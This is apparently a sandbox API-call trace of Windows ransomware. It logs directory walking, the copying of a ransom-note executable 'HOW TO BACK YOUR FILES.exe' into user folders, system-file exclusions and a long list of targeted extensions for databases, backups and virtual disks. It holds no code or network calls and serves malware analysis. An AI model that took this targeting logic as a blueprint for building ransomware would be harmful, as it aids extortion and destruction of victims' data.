out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4ac2c9c0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4ac2c9c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 0 [0065.399] FindClose (in: hFindFile=0x2cd068 | out: hFindFile=0x2cd068) returned 1 [0065.399] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7c30 [0065.399] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds Cache\\1NBUR4HR", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds Cache\\1NBUR4HR") returned="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds Cache\\1NBUR4HR" [0065.399] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9eb0 | out: hHeap=0x2b0000) returned 1 [0065.399] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7c28 | out: hHeap=0x2b0000) returned 1 [0065.399] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds Cache\\1NBUR4HR") returned 67 [0065.399] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds Cache\\1NBUR4HR" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds Cache\\1NBUR4HR") returned="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds Cache\\1NBUR4HR" [0065.399] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0065.399] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds Cache\\1NBUR4HR\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\microsoft\\feeds cache\\1nbur4hr\\how to back your files.exe"), bFailIfExists=1) returned 0 [0065.399] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x12c [0065.399] GetLastError () returned 0x0 [0065.399] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0065.399] ReadFile (in: hFile=0x12c, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0065.400] CloseHandle (hObject=0x12c) returned 1 [0065.400] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0065.400] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.400] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds Cache\\1NBUR4HR\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4ac2c9c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ac2c9c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0065.400] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.400] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0065.400] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0065.400] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4ac2c9c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ac2c9c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0065.400] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.400] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0065.400] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0065.400] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0065.400] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x668c5a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x668c5a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfea09ee5, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x43, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0065.400] lstrcmpiW (lpString1="desktop.ini", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.400] lstrcmpiW (lpString1="desktop.ini", lpString2="aoldtz.exe") returned 1 [0065.400] lstrcmpiW (lpString1="desktop.ini", lpString2=".") returned 1 [0065.400] lstrcmpiW (lpString1="desktop.ini", lpString2="..") returned 1 [0065.400] lstrcmpiW (lpString1="desktop.ini", lpString2="windows") returned -1 [0065.400] lstrcmpiW (lpString1="desktop.ini", lpString2="bootmgr") returned 1 [0065.400] lstrcmpiW (lpString1="desktop.ini", lpString2="temp") returned -1 [0065.400] lstrcmpiW (lpString1="desktop.ini", lpString2="pagefile.sys") returned -1 [0065.400] lstrcmpiW (lpString1="desktop.ini", lpString2="boot") returned 1 [0065.400] lstrcmpiW (lpString1="desktop.ini", lpString2="ids.txt") returned -1 [0065.400] lstrcmpiW (lpString1="desktop.ini", lpString2="ntuser.dat") returned -1 [0065.400] lstrcmpiW (lpString1="desktop.ini", lpString2="perflogs") returned -1 [0065.401] lstrcmpiW (lpString1="desktop.ini", lpString2="MSBuild") returned -1 [0065.401] lstrlenW (lpString="desktop.ini") returned 11 [0065.401] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds Cache\\1NBUR4HR\\*") returned 69 [0065.401] lstrcpyW (in: lpString1=0x2cce488, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0065.401] lstrlenW (lpString="desktop.ini") returned 11 [0065.401] lstrlenW (lpString="Ares865") returned 7 [0065.401] lstrcmpiW (lpString1="top.ini", lpString2="Ares865") returned 1 [0065.401] lstrlenW (lpString=".dll") returned 4 [0065.401] lstrcmpiW (lpString1="desktop.ini", lpString2=".dll") returned 1 [0065.401] lstrlenW (lpString=".lnk") returned 4 [0065.401] lstrcmpiW (lpString1="desktop.ini", lpString2=".lnk") returned 1 [0065.401] lstrlenW (lpString=".ini") returned 4 [0065.401] lstrcmpiW (lpString1="desktop.ini", lpString2=".ini") returned 1 [0065.401] lstrlenW (lpString=".sys") returned 4 [0065.401] lstrcmpiW (lpString1="desktop.ini", lpString2=".sys") returned 1 [0065.401] lstrlenW (lpString="desktop.ini") returned 11 [0065.401] lstrlenW (lpString="bak") returned 3 [0065.401] lstrcmpiW (lpString1="ini", lpString2="bak") returned 1 [0065.401] lstrlenW (lpString="ba_") returned 3 [0065.401] lstrcmpiW (lpString1="ini", lpString2="ba_") returned 1 [0065.401] lstrlenW (lpString="dbb") returned 3 [0065.401] lstrcmpiW (lpString1="ini", lpString2="dbb") returned 1 [0065.401] lstrlenW (lpString="vmdk") returned 4 [0065.401] lstrcmpiW (lpString1=".ini", lpString2="vmdk") returned -1 [0065.401] lstrlenW (lpString="rar") returned 3 [0065.401] lstrcmpiW (lpString1="ini", lpString2="rar") returned -1 [0065.401] lstrlenW (lpString="zip") returned 3 [0065.401] lstrcmpiW (lpString1="ini", lpString2="zip") returned -1 [0065.401] lstrlenW (lpString="tgz") returned 3 [0065.401] lstrcmpiW (lpString1="ini", lpString2="tgz") returned -1 [0065.401] lstrlenW (lpString="vbox") returned 4 [0065.401] lstrcmpiW (lpString1=".ini", lpString2="vbox") returned -1 [0065.401] lstrlenW (lpString="vdi") returned 3 [0065.401] lstrcmpiW (lpString1="ini", lpString2="vdi") returned -1 [0065.402] lstrlenW (lpString="vhd") returned 3 [0065.402] lstrcmpiW (lpString1="ini", lpString2="vhd") returned -1 [0065.402] lstrlenW (lpString="vhdx") returned 4 [0065.402] lstrcmpiW (lpString1=".ini", lpString2="vhdx") returned -1 [0065.402] lstrlenW (lpString="avhd") returned 4 [0065.402] lstrcmpiW (lpString1=".ini", lpString2="avhd") returned -1 [0065.402] lstrlenW (lpString="db") returned 2 [0065.402] lstrcmpiW (lpString1="ni", lpString2="db") returned 1 [0065.402] lstrlenW (lpString="db2") returned 3 [0065.402] lstrcmpiW (lpString1="ini", lpString2="db2") returned 1 [0065.402] lstrlenW (lpString="db3") returned 3 [0065.402] lstrcmpiW (lpString1="ini", lpString2="db3") returned 1 [0065.402] lstrlenW (lpString="dbf") returned 3 [0065.402] lstrcmpiW (lpString1="ini", lpString2="dbf") returned 1 [0065.402] lstrlenW (lpString="mdf") returned 3 [0065.402] lstrcmpiW (lpString1="ini", lpString2="mdf") returned -1 [0065.402] lstrlenW (lpString="mdb") returned 3 [0065.402] lstrcmpiW (lpString1="ini", lpString2="mdb") returned -1 [0065.402] lstrlenW (lpString="sql") returned 3 [0065.402] lstrcmpiW (lpString1="ini", lpString2="sql") returned -1 [0065.402] lstrlenW (lpString="sqlite") returned 6 [0065.402] lstrcmpiW (lpString1="op.ini", lpString2="sqlite") returned -1 [0065.402] lstrlenW (lpString="sqlite3") returned 7 [0065.402] lstrcmpiW (lpString1="top.ini", lpString2="sqlite3") returned 1 [0065.402] lstrlenW (lpString="sqlitedb") returned 8 [0065.402] lstrcmpiW (lpString1="ktop.ini", lpString2="sqlitedb") returned -1 [0065.402] lstrlenW (lpString="xml") returned 3 [0065.402] lstrcmpiW (lpString1="ini", lpString2="xml") returned -1 [0065.402] lstrlenW (lpString="$er") returned 3 [0065.402] lstrcmpiW (lpString1="ini", lpString2="$er") returned 1 [0065.402] lstrlenW (lpString="4dd") returned 3 [0065.402] lstrcmpiW (lpString1="ini", lpString2="4dd") returned 1 [0065.402] lstrlenW (lpString="4dl") returned 3 [0065.402] lstrcmpiW (lpString1="ini", lpString2="4dl") returned 1 [0065.402] lstrlenW (lpString="^^^") returned 3 [0065.402] lstrcmpiW (lpString1="ini", lpString2="^^^") returned 1 [0065.402] lstrlenW (lpString="abs") returned 3 [0065.403] lstrcmpiW (lpString1="ini", lpString2="abs") returned 1 [0065.403] lstrlenW (lpString="abx") returned 3 [0065.403] lstrcmpiW (lpString1="ini", lpString2="abx") returned 1 [0065.403] lstrlenW (lpString="accdb") returned 5 [0065.403] lstrcmpiW (lpString1="p.ini", lpString2="accdb") returned 1 [0065.403] lstrlenW (lpString="accdc") returned 5 [0065.403] lstrcmpiW (lpString1="p.ini", lpString2="accdc") returned 1 [0065.403] lstrlenW (lpString="accde") returned 5 [0065.403] lstrcmpiW (lpString1="p.ini", lpString2="accde") returned 1 [0065.403] lstrlenW (lpString="accdr") returned 5 [0065.403] lstrcmpiW (lpString1="p.ini", lpString2="accdr") returned 1 [0065.403] lstrlenW (lpString="accdt") returned 5 [0065.403] lstrcmpiW (lpString1="p.ini", lpString2="accdt") returned 1 [0065.403] lstrlenW (lpString="accdw") returned 5 [0065.403] lstrcmpiW (lpString1="p.ini", lpString2="accdw") returned 1 [0065.403] lstrlenW (lpString="accft") returned 5 [0065.403] lstrcmpiW (lpString1="p.ini", lpString2="accft") returned 1 [0065.403] lstrlenW (lpString="adb") returned 3 [0065.403] lstrcmpiW (lpString1="ini", lpString2="adb") returned 1 [0065.403] lstrlenW (lpString="adb") returned 3 [0065.403] lstrcmpiW (lpString1="ini", lpString2="adb") returned 1 [0065.403] lstrlenW (lpString="ade") returned 3 [0065.403] lstrcmpiW (lpString1="ini", lpString2="ade") returned 1 [0065.403] lstrlenW (lpString="adf") returned 3 [0065.403] lstrcmpiW (lpString1="ini", lpString2="adf") returned 1 [0065.403] lstrlenW (lpString="adn") returned 3 [0065.403] lstrcmpiW (lpString1="ini", lpString2="adn") returned 1 [0065.403] lstrlenW (lpString="adp") returned 3 [0065.403] lstrcmpiW (lpString1="ini", lpString2="adp") returned 1 [0065.403] lstrlenW (lpString="alf") returned 3 [0065.403] lstrcmpiW (lpString1="ini", lpString2="alf") returned 1 [0065.403] lstrlenW (lpString="ask") returned 3 [0065.403] lstrcmpiW (lpString1="ini", lpString2="ask") returned 1 [0065.403] lstrlenW (lpString="btr") returned 3 [0065.403] lstrcmpiW (lpString1="ini", lpString2="btr") returned 1 [0065.403] lstrlenW (lpString="cat") returned 3 [0065.403] lstrcmpiW (lpString1="ini", lpString2="cat") returned 1 [0065.404] lstrlenW (lpString="cdb") returned 3 [0065.404] lstrcmpiW (lpString1="ini", lpString2="cdb") returned 1 [0065.404] lstrlenW (lpString="ckp") returned 3 [0065.404] lstrcmpiW (lpString1="ini", lpString2="ckp") returned 1 [0065.404] lstrlenW (lpString="cma") returned 3 [0065.404] lstrcmpiW (lpString1="ini", lpString2="cma") returned 1 [0065.404] lstrlenW (lpString="cpd") returned 3 [0065.404] lstrcmpiW (lpString1="ini", lpString2="cpd") returned 1 [0065.404] lstrlenW (lpString="dacpac") returned 6 [0065.404] lstrcmpiW (lpString1="op.ini", lpString2="dacpac") returned 1 [0065.404] lstrlenW (lpString="dad") returned 3 [0065.404] lstrcmpiW (lpString1="ini", lpString2="dad") returned 1 [0065.404] lstrlenW (lpString="dadiagrams") returned 10 [0065.404] lstrcmpiW (lpString1="esktop.ini", lpString2="dadiagrams") returned 1 [0065.404] lstrlenW (lpString="daschema") returned 8 [0065.404] lstrcmpiW (lpString1="ktop.ini", lpString2="daschema") returned 1 [0065.404] lstrlenW (lpString="db-journal") returned 10 [0065.404] lstrcmpiW (lpString1="esktop.ini", lpString2="db-journal") returned 1 [0065.404] lstrlenW (lpString="db-shm") returned 6 [0065.404] lstrcmpiW (lpString1="op.ini", lpString2="db-shm") returned 1 [0065.404] lstrlenW (lpString="db-wal") returned 6 [0065.404] lstrcmpiW (lpString1="op.ini", lpString2="db-wal") returned 1 [0065.404] lstrlenW (lpString="dbc") returned 3 [0065.404] lstrcmpiW (lpString1="ini", lpString2="dbc") returned 1 [0065.404] lstrlenW (lpString="dbs") returned 3 [0065.404] lstrcmpiW (lpString1="ini", lpString2="dbs") returned 1 [0065.404] lstrlenW (lpString="dbt") returned 3 [0065.404] lstrcmpiW (lpString1="ini", lpString2="dbt") returned 1 [0065.404] lstrlenW (lpString="dbv") returned 3 [0065.404] lstrcmpiW (lpString1="ini", lpString2="dbv") returned 1 [0065.404] lstrlenW (lpString="dbx") returned 3 [0065.404] lstrcmpiW (lpString1="ini", lpString2="dbx") returned 1 [0065.404] lstrlenW (lpString="dcb") returned 3 [0065.404] lstrcmpiW (lpString1="ini", lpString2="dcb") returned 1 [0065.404] lstrlenW (lpString="dct") returned 3 [0065.404] lstrcmpiW (lpString1="ini", lpString2="dct") returned 1 [0065.404] lstrlenW (lpString="dcx") returned 3 [0065.405] lstrcmpiW (lpString1="ini", lpString2="dcx") returned 1 [0065.405] lstrlenW (lpString="ddl") returned 3 [0065.405] lstrcmpiW (lpString1="ini", lpString2="ddl") returned 1 [0065.405] lstrlenW (lpString="dlis") returned 4 [0065.405] lstrcmpiW (lpString1=".ini", lpString2="dlis") returned -1 [0065.405] lstrlenW (lpString="dp1") returned 3 [0065.405] lstrcmpiW (lpString1="ini", lpString2="dp1") returned 1 [0065.405] lstrlenW (lpString="dqy") returned 3 [0065.405] lstrcmpiW (lpString1="ini", lpString2="dqy") returned 1 [0065.405] lstrlenW (lpString="dsk") returned 3 [0065.405] lstrcmpiW (lpString1="ini", lpString2="dsk") returned 1 [0065.405] lstrlenW (lpString="dsn") returned 3 [0065.405] lstrcmpiW (lpString1="ini", lpString2="dsn") returned 1 [0065.405] lstrlenW (lpString="dtsx") returned 4 [0065.405] lstrcmpiW (lpString1=".ini", lpString2="dtsx") returned -1 [0065.405] lstrlenW (lpString="dxl") returned 3 [0065.405] lstrcmpiW (lpString1="ini", lpString2="dxl") returned 1 [0065.405] lstrlenW (lpString="eco") returned 3 [0065.405] lstrcmpiW (lpString1="ini", lpString2="eco") returned 1 [0065.405] lstrlenW (lpString="ecx") returned 3 [0065.405] lstrcmpiW (lpString1="ini", lpString2="ecx") returned 1 [0065.405] lstrlenW (lpString="edb") returned 3 [0065.405] lstrcmpiW (lpString1="ini", lpString2="edb") returned 1 [0065.405] lstrlenW (lpString="epim") returned 4 [0065.406] lstrcmpiW (lpString1=".ini", lpString2="epim") returned -1 [0065.406] lstrlenW (lpString="fcd") returned 3 [0065.406] lstrcmpiW (lpString1="ini", lpString2="fcd") returned 1 [0065.406] lstrlenW (lpString="fdb") returned 3 [0065.406] lstrcmpiW (lpString1="ini", lpString2="fdb") returned 1 [0065.406] lstrlenW (lpString="fic") returned 3 [0065.406] lstrcmpiW (lpString1="ini", lpString2="fic") returned 1 [0065.406] lstrlenW (lpString="flexolibrary") returned 12 [0065.406] lstrlenW (lpString="fm5") returned 3 [0065.406] lstrcmpiW (lpString1="ini", lpString2="fm5") returned 1 [0065.406] lstrlenW (lpString="fmp") returned 3 [0065.406] lstrcmpiW (lpString1="ini", lpString2="fmp") returned 1 [0065.406] lstrlenW (lpString="fmp12") returned 5 [0065.406] lstrcmpiW (lpString1="p.ini", lpString2="fmp12") returned 1 [0065.406] lstrlenW (lpString="fmpsl") returned 5 [0065.406] lstrcmpiW (lpString1="p.ini", lpString2="fmpsl") returned 1 [0065.406] lstrlenW (lpString="fol") returned 3 [0065.406] lstrcmpiW (lpString1="ini", lpString2="fol") returned 1 [0065.406] lstrlenW (lpString="fp3") returned 3 [0065.406] lstrcmpiW (lpString1="ini", lpString2="fp3") returned 1 [0065.406] lstrlenW (lpString="fp4") returned 3 [0065.406] lstrcmpiW (lpString1="ini", lpString2="fp4") returned 1 [0065.406] lstrlenW (lpString="fp5") returned 3 [0065.406] lstrcmpiW (lpString1="ini", lpString2="fp5") returned 1 [0065.406] lstrlenW (lpString="fp7") returned 3 [0065.406] lstrcmpiW (lpString1="ini", lpString2="fp7") returned 1 [0065.406] lstrlenW (lpString="fpt") returned 3 [0065.406] lstrcmpiW (lpString1="ini", lpString2="fpt") returned 1 [0065.406] lstrlenW (lpString="frm") returned 3 [0065.406] lstrcmpiW (lpString1="ini", lpString2="frm") returned 1 [0065.406] lstrlenW (lpString="gdb") returned 3 [0065.406] lstrcmpiW (lpString1="ini", lpString2="gdb") returned 1 [0065.406] lstrlenW (lpString="gdb") returned 3 [0065.406] lstrcmpiW (lpString1="ini", lpString2="gdb") returned 1 [0065.406] lstrlenW (lpString="grdb") returned 4 [0065.406] lstrcmpiW (lpString1=".ini", lpString2="grdb") returned -1 [0065.406] lstrlenW (lpString="gwi") returned 3 [0065.407] lstrcmpiW (lpString1="ini", lpString2="gwi") returned 1 [0065.407] lstrlenW (lpString="hdb") returned 3 [0065.407] lstrcmpiW (lpString1="ini", lpString2="hdb") returned 1 [0065.407] lstrlenW (lpString="his") returned 3 [0065.407] lstrcmpiW (lpString1="ini", lpString2="his") returned 1 [0065.407] lstrlenW (lpString="ib") returned 2 [0065.407] lstrcmpiW (lpString1="ni", lpString2="ib") returned 1 [0065.407] lstrlenW (lpString="idb") returned 3 [0065.407] lstrcmpiW (lpString1="ini", lpString2="idb") returned 1 [0065.407] lstrlenW (lpString="ihx") returned 3 [0065.407] lstrcmpiW (lpString1="ini", lpString2="ihx") returned 1 [0065.407] lstrlenW (lpString="itdb") returned 4 [0065.407] lstrcmpiW (lpString1=".ini", lpString2="itdb") returned -1 [0065.407] lstrlenW (lpString="itw") returned 3 [0065.407] lstrcmpiW (lpString1="ini", lpString2="itw") returned -1 [0065.407] lstrlenW (lpString="jet") returned 3 [0065.407] lstrcmpiW (lpString1="ini", lpString2="jet") returned -1 [0065.407] lstrlenW (lpString="jtx") returned 3 [0065.407] lstrcmpiW (lpString1="ini", lpString2="jtx") returned -1 [0065.407] lstrlenW (lpString="kdb") returned 3 [0065.407] lstrcmpiW (lpString1="ini", lpString2="kdb") returned -1 [0065.407] lstrlenW (lpString="kexi") returned 4 [0065.407] lstrcmpiW (lpString1=".ini", lpString2="kexi") returned -1 [0065.407] lstrlenW (lpString="kexic") returned 5 [0065.407] lstrcmpiW (lpString1="p.ini", lpString2="kexic") returned 1 [0065.407] lstrlenW (lpString="kexis") returned 5 [0065.407] lstrcmpiW (lpString1="p.ini", lpString2="kexis") returned 1 [0065.407] lstrlenW (lpString="lgc") returned 3 [0065.407] lstrcmpiW (lpString1="ini", lpString2="lgc") returned -1 [0065.407] lstrlenW (lpString="lwx") returned 3 [0065.407] lstrcmpiW (lpString1="ini", lpString2="lwx") returned -1 [0065.407] lstrlenW (lpString="maf") returned 3 [0065.407] lstrcmpiW (lpString1="ini", lpString2="maf") returned -1 [0065.407] lstrlenW (lpString="maq") returned 3 [0065.407] lstrcmpiW (lpString1="ini", lpString2="maq") returned -1 [0065.407] lstrlenW (lpString="mar") returned 3 [0065.407] lstrcmpiW (lpString1="ini", lpString2="mar") returned -1 [0065.408] lstrlenW (lpString="marshal") returned 7 [0065.408] lstrcmpiW (lpString1="top.ini", lpString2="marshal") returned 1 [0065.408] lstrlenW (lpString="mas") returned 3 [0065.408] lstrcmpiW (lpString1="ini", lpString2="mas") returned -1 [0065.408] lstrlenW (lpString="mav") returned 3 [0065.408] lstrcmpiW (lpString1="ini", lpString2="mav") returned -1 [0065.408] lstrlenW (lpString="maw") returned 3 [0065.408] lstrcmpiW (lpString1="ini", lpString2="maw") returned -1 [0065.408] lstrlenW (lpString="mdbhtml") returned 7 [0065.408] lstrcmpiW (lpString1="top.ini", lpString2="mdbhtml") returned 1 [0065.408] lstrlenW (lpString="mdn") returned 3 [0065.408] lstrcmpiW (lpString1="ini", lpString2="mdn") returned -1 [0065.408] lstrlenW (lpString="mdt") returned 3 [0065.408] lstrcmpiW (lpString1="ini", lpString2="mdt") returned -1 [0065.408] lstrlenW (lpString="mfd") returned 3 [0065.408] lstrcmpiW (lpString1="ini", lpString2="mfd") returned -1 [0065.408] lstrlenW (lpString="mpd") returned 3 [0065.408] lstrcmpiW (lpString1="ini", lpString2="mpd") returned -1 [0065.408] lstrlenW (lpString="mrg") returned 3 [0065.408] lstrcmpiW (lpString1="ini", lpString2="mrg") returned -1 [0065.408] lstrlenW (lpString="mud") returned 3 [0065.408] lstrcmpiW (lpString1="ini", lpString2="mud") returned -1 [0065.408] lstrlenW (lpString="mwb") returned 3 [0065.408] lstrcmpiW (lpString1="ini", lpString2="mwb") returned -1 [0065.408] lstrlenW (lpString="myd") returned 3 [0065.408] lstrcmpiW (lpString1="ini", lpString2="myd") returned -1 [0065.408] lstrlenW (lpString="ndf") returned 3 [0065.408] lstrcmpiW (lpString1="ini", lpString2="ndf") returned -1 [0065.408] lstrlenW (lpString="nnt") returned 3 [0065.408] lstrcmpiW (lpString1="ini", lpString2="nnt") returned -1 [0065.408] lstrlenW (lpString="nrmlib") returned 6 [0065.408] lstrcmpiW (lpString1="op.ini", lpString2="nrmlib") returned 1 [0065.408] lstrlenW (lpString="ns2") returned 3 [0065.408] lstrcmpiW (lpString1="ini", lpString2="ns2") returned -1 [0065.408] lstrlenW (lpString="ns3") returned 3 [0065.408] lstrcmpiW (lpString1="ini", lpString2="ns3") returned -1 [0065.408] lstrlenW (lpString="ns4") returned 3 [0065.408] lstrcmpiW (lpString1="ini", lpString2="ns4") returned -1 [0065.409] lstrlenW (lpString="nsf") returned 3 [0065.409] lstrcmpiW (lpString1="ini", lpString2="nsf") returned -1 [0065.409] lstrlenW (lpString="nv") returned 2 [0065.409] lstrcmpiW (lpString1="ni", lpString2="nv") returned -1 [0065.409] lstrlenW (lpString="nv2") returned 3 [0065.409] lstrcmpiW (lpString1="ini", lpString2="nv2") returned -1 [0065.409] lstrlenW (lpString="nwdb") returned 4 [0065.409] lstrcmpiW (lpString1=".ini", lpString2="nwdb") returned -1 [0065.409] lstrlenW (lpString="nyf") returned 3 [0065.409] lstrcmpiW (lpString1="ini", lpString2="nyf") returned -1 [0065.409] lstrlenW (lpString="odb") returned 3 [0065.409] lstrcmpiW (lpString1="ini", lpString2="odb") returned -1 [0065.409] lstrlenW (lpString="odb") returned 3 [0065.409] lstrcmpiW (lpString1="ini", lpString2="odb") returned -1 [0065.409] lstrlenW (lpString="oqy") returned 3 [0065.409] lstrcmpiW (lpString1="ini", lpString2="oqy") returned -1 [0065.409] lstrlenW (lpString="ora") returned 3 [0065.409] lstrcmpiW (lpString1="ini", lpString2="ora") returned -1 [0065.409] lstrlenW (lpString="orx") returned 3 [0065.409] lstrcmpiW (lpString1="ini", lpString2="orx") returned -1 [0065.409] lstrlenW (lpString="owc") returned 3 [0065.409] lstrcmpiW (lpString1="ini", lpString2="owc") returned -1 [0065.409] lstrlenW (lpString="p96") returned 3 [0065.409] lstrcmpiW (lpString1="ini", lpString2="p96") returned -1 [0065.409] lstrlenW (lpString="p97") returned 3 [0065.409] lstrcmpiW (lpString1="ini", lpString2="p97") returned -1 [0065.409] lstrlenW (lpString="pan") returned 3 [0065.409] lstrcmpiW (lpString1="ini", lpString2="pan") returned -1 [0065.409] lstrlenW (lpString="pdb") returned 3 [0065.409] lstrcmpiW (lpString1="ini", lpString2="pdb") returned -1 [0065.409] lstrlenW (lpString="pdm") returned 3 [0065.409] lstrcmpiW (lpString1="ini", lpString2="pdm") returned -1 [0065.409] lstrlenW (lpString="pnz") returned 3 [0065.409] lstrcmpiW (lpString1="ini", lpString2="pnz") returned -1 [0065.409] lstrlenW (lpString="qry") returned 3 [0065.409] lstrcmpiW (lpString1="ini", lpString2="qry") returned -1 [0065.409] lstrlenW (lpString="qvd") returned 3 [0065.409] lstrcmpiW (lpString1="ini", lpString2="qvd") returned -1 [0065.410] lstrlenW (lpString="rbf") returned 3 [0065.410] lstrcmpiW (lpString1="ini", lpString2="rbf") returned -1 [0065.410] lstrlenW (lpString="rctd") returned 4 [0065.410] lstrcmpiW (lpString1=".ini", lpString2="rctd") returned -1 [0065.410] lstrlenW (lpString="rod") returned 3 [0065.410] lstrcmpiW (lpString1="ini", lpString2="rod") returned -1 [0065.410] lstrlenW (lpString="rodx") returned 4 [0065.410] lstrcmpiW (lpString1=".ini", lpString2="rodx") returned -1 [0065.410] lstrlenW (lpString="rpd") returned 3 [0065.410] lstrcmpiW (lpString1="ini", lpString2="rpd") returned -1 [0065.410] lstrlenW (lpString="rsd") returned 3 [0065.410] lstrcmpiW (lpString1="ini", lpString2="rsd") returned -1 [0065.410] lstrlenW (lpString="sas7bdat") returned 8 [0065.410] lstrcmpiW (lpString1="ktop.ini", lpString2="sas7bdat") returned -1 [0065.410] lstrlenW (lpString="sbf") returned 3 [0065.410] lstrcmpiW (lpString1="ini", lpString2="sbf") returned -1 [0065.410] lstrlenW (lpString="scx") returned 3 [0065.410] lstrcmpiW (lpString1="ini", lpString2="scx") returned -1 [0065.410] lstrlenW (lpString="sdb") returned 3 [0065.410] lstrcmpiW (lpString1="ini", lpString2="sdb") returned -1 [0065.410] lstrlenW (lpString="sdc") returned 3 [0065.410] lstrcmpiW (lpString1="ini", lpString2="sdc") returned -1 [0065.410] lstrlenW (lpString="sdf") returned 3 [0065.410] lstrcmpiW (lpString1="ini", lpString2="sdf") returned -1 [0065.410] lstrlenW (lpString="sis") returned 3 [0065.410] lstrcmpiW (lpString1="ini", lpString2="sis") returned -1 [0065.410] lstrlenW (lpString="spq") returned 3 [0065.410] lstrcmpiW (lpString1="ini", lpString2="spq") returned -1 [0065.410] lstrlenW (lpString="te") returned 2 [0065.410] lstrcmpiW (lpString1="ni", lpString2="te") returned -1 [0065.410] lstrlenW (lpString="teacher") returned 7 [0065.410] lstrcmpiW (lpString1="top.ini", lpString2="teacher") returned 1 [0065.410] lstrlenW (lpString="tmd") returned 3 [0065.410] lstrcmpiW (lpString1="ini", lpString2="tmd") returned -1 [0065.410] lstrlenW (lpString="tps") returned 3 [0065.410] lstrcmpiW (lpString1="ini", lpString2="tps") returned -1 [0065.410] lstrlenW (lpString="trc") returned 3 [0065.411] lstrcmpiW (lpString1="ini", lpString2="trc") returned -1 